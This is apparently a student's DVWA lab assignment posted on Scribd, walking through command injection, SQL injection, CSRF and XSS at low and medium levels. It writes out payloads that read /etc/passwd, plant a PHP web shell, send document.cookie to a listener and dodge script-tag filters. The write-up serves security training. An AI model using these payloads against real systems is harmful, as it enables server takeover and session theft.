Scribd Logo
Upload

Welcome to Scribd!

  • 29 views

    Serikov Ayanbek Assignment 4

    Uploaded by

    Ayanbek Serikov
    This document summarizes security testing done at different security levels. At low security level, command injection and SQL injection are possible. SQL blind injection and XSS vulnerabilities like reflected and stored XSS are also found. At medium level, command injection works with alternate syntax, SQL injection is prevented but blind SQL injection using sqlmap works. CSRF has additional checks but can be bypassed, and XSS is prevented but works with alternate casing of script tags.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd

    Serikov Ayanbek Assignment 4

    Uploaded by

    Ayanbek Serikov
    29 views63 pages
    This document summarizes security testing done at different security levels. At low security level, command injection and SQL injection are possible. SQL blind injection and XSS vulnerabilities like reflected and stored XSS are also found. At medium level, command injection works with alternate syntax, SQL injection is prevented but blind SQL injection using sqlmap works. CSRF has additional checks but can be bypassed, and XSS is prevented but works with alternate casing of script tags.

    Original Title

    dvwa

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    This document summarizes security testing done at different security levels. At low security level, command injection and SQL injection are possible. SQL blind injection and XSS vulnerabilities like reflected and stored XSS are also found. At medium level, command injection works with alternate syntax, SQL injection is prevented but blind SQL injection using sqlmap works. CSRF has additional checks but can be bypassed, and XSS is prevented but works with alternate casing of script tags.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Download as docx, pdf, or txt
    29 views63 pages

    Serikov Ayanbek Assignment 4

    Uploaded by

    Ayanbek Serikov
    This document summarizes security testing done at different security levels. At low security level, command injection and SQL injection are possible. SQL blind injection and XSS vulnerabilities like reflected and stored XSS are also found. At medium level, command injection works with alternate syntax, SQL injection is prevented but blind SQL injection using sqlmap works. CSRF has additional checks but can be bypassed, and XSS is prevented but works with alternate casing of script tags.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Download as docx, pdf, or txt
    You are on page 1of 63

    Serikov Ayanbek Assignment 4

    Contents
    Security level is low..........................................................................................................................................1
    Command injection.......................................................................................................................................2
    SQL injection................................................................................................................................................9
    SQL Injection (Blind)..................................................................................................................................15
    CSRF...........................................................................................................................................................23
    DOM Based Cross Site Scripting (XSS).....................................................................................................27
    Vulnerability: Reflected Cross Site Scripting (XSS)...................................................................................31
    Vulnerability: Stored Cross Site Scripting (XSS)........................................................................................34
    Security level is medium.................................................................................................................................37
    Command injection.....................................................................................................................................37
    SQL injection..............................................................................................................................................42
    SQL Injection (Blind)..................................................................................................................................49
    CSRF...........................................................................................................................................................53
    DOM Based Cross Site Scripting (XSS).....................................................................................................56
    Vulnerability: Reflected Cross Site Scripting (XSS)...................................................................................59
    Vulnerability: Stored Cross Site Scripting (XSS)........................................................................................61

    Security level is low.


    Command injection
    Code checks OS but does not check if it is only ip address. We can run multiple command by
    separating by “;”

    Pinging

    ; ls
    ; cat index.php

    ; whoami; hostname
    ; ifconfig; ls../

    Echo “String”
    cat etc/passwd

    reverse shell
    reverse shell use
    Creating php file
    127.0.0.1; echo "<?php system(\$_GET['c']); ?>" >hello.php
    Opening php file

    By url executing commands


    SQL injection

    Using union
    Getting every user
    Getting user and database name

    Getting version
    Getting table name by using union

    Getting column by using union


    Getting all user and password in one line

    Getting hostname
    SQL Injection (Blind)
    Code doesn’t check and filter parameter id. It returns only User ID ‘exists’ or ‘Missing’.
    Using Burp Suite
    Checking columns
    From Burp Suite we know url and cookie, so we can do sqlmap
    CSRF
    It changes password

    I capture it in burp suite


    I can change password by url icanchangepassbyurl.

    I checked it by logging
    DOM Based Cross Site Scripting (XSS)
    I changed url
    Vulnerability: Reflected Cross Site Scripting (XSS)
    Simple script
    <script> window.location='http://127.0.0.1:1777/?cookie=' + document.cookie </script>. This is
    now stored as a comment. When a user navigates to this page, script will execute and send user’s
    cookie to the attacker.

    Put listener

    Vulnerability: Stored Cross Site Scripting (XSS)


    It does not check or filter
    <script>alert(U a hacked)</script>

    <script>alert(document.domain)</script>
    <script>alert(document.cookie)</script>
    Security level is medium.

    Command injection
    Seems like blacklist was added. But there are other metacharacters to try such as &
    Didn’t work 127.0.0.1; ls

    But worked &ls


    127.0.0.1 & echo "<?php system(\$_GET['c']); ?>" >hello.php
    SQL injection
    It didn’t work
    As in low level, checked if it can be ordered by 3

    So no column 3
    No error. It means it can be ordered by column 2.
    SQL Injection (Blind)
    So I used sqlmap
    CSRF
    Looks like it has some security. It checks HTTP referrer and the server name. If the server name is
    presented in referrer, password will change.
    I opened burp suite and added referrer.
    DOM Based Cross Site Scripting (XSS)
    It has filter <script>. But we can use <SCRIPT>, <ScRipt> and so on.
    Vulnerability: Reflected Cross Site Scripting (XSS)
    Capital script worked
    Vulnerability: Stored Cross Site Scripting (XSS)

    I changed max-length value so I did <SCRIPT>alert('sss')</SCRIPT>

    <SCRIPT>alert("cookie: "+document.cookie)</ SCRIPT >


     <img src=x onerror=alert(document.domain)>

    <SCRIPT> document.location.href="https://google.com" </SCRIPT> Send us to the website we


    want
    By pressing “Ayan” we can go to specific website

    You might also like